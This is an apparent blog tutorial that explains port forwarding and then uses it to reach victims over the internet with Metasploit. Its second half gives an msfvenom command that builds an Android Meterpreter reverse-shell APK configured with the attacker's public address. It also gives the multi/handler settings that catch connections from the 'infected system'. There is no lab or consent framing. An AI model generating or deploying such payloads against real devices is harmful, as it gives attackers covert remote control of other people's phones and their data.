What is port forwarding?
In the IT sector, if you are a system administrator, an ethical hacker or even a developer, you will see this application of network address translation (which is one of the functions of a router) called port forwarding or port mapping.
A formal definition will be, port forwarding is an application of a network address translation that redirects a communication request of one address and one port combination to another while the packets are traversing from a network gateway like router o firewall, lets see an example to understand it better, suppose you want to use your computer to provide some sort of service like a web service (software module designed to do certain tasks.),the biggest problem is someone from the internet cannot access the services as your computer is inside a private network, to present your service to the hosts on internet you need to do port forwarding as shown in the video, you have to mention the address of localhost(which have the service) in the IP address block and the port which you want to forward to receive the connection.
WHY PORT FORWARDING
- Running a public HTTP server within a private LAN
- Permitting secure shell access to a host on the private LAN from the Internet
- Permitting FTP access to a host on a private LAN from the Internet
- Running a publicly available game server within a private LAN
PORT FORWARDING FOR METASPLOIT
- Fill the IP address of the Kali Linux in the IP address block in the router settings.
- In the payload generation command, use public address of your internet connection in LHOST and the port you have forwarded in the LPORT.
- In Metasploit using multi handler exploit, with the required payload in the LHOST option use the local address of the kali Linux and in LPORT option use the port which has been forwarded.
COMMANDS: Example being used (Android Meterpreter)
- msfvenom -p android/meterpreter/reverse_tcp LHOST=Public address LPORT=forwarded port R> name.apk
- In Metasploit:
- use multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST “private IP address”
- set LPORT “forwarded port”
The main concept here is that the payload is configured with the public address of our network and the forwarded port hence any system running that payload will try to make a reverse connection to the respective IP address and port hence a connection request will come through the forwarded port to the router and router will pass it to the respective localhost hence there will be connection between our kali machine and the infected system.